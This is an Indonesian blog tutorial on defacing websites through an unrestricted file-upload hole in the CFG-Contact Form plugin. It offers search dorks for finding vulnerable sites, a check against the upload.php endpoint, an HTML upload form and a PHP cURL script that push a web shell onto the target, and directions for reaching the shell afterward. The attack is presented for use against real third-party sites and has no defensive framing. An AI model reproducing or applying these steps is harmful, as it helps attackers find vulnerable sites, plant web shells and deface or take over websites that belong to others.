Deface Menggunakan CFG-Contact Form Vulnerability File Upload

Deface Menggunakan CFG-Contact Form Vulnerability File Upload

Kali ini saya mau share tutorial mengenai salah satu teknik deface dengan metode Cfg-Contact Form.

Oke Langsung aja.

#Dork:

"/cfg-contactform-1/"

"/cfg-contactform-2/"

Cari target dengan dork diatas

Pilih salah satu target dan masukan Exploit dibawah ini

# Exploit tergantung contact form yang keberapa agan pilih

Contoh : www.site.com/[path]/cfg-contactform-1/inc/upload.php

Kalau ada tulisan {"filename":"blabla"} itu berarti vuln webnya.

Lalu upload shell dengan CSRF

CSRF :

<form enctype="multipart/form-data"
action="target" method="post">
<input type="text" name="folder" value="./" /><br />
Please choose a file: <input name="Filedata" type="file" /><br />
<input type="submit" value="upload" />
</form>

Versi PHP

<?php
$uploadfile="shell.php";
$ch = curl_init("hurt.co.li/path/cfg-contactform-1/inc/upload.php
?folder=/cfg-contactform/upload/&fileext=php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Copy dan simpan dengan script diatas dengan format .html

Kalau sukses nanti ada tulisan ["filename":"shell.php"]

#Acces Shell : www.target.co.li/[path]/cfg-contactform-1/upload/namashell.php [tergantung dork yang kalian pake]

Belum ada Komentar untuk "Deface Menggunakan CFG-Contact Form Vulnerability File Upload"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel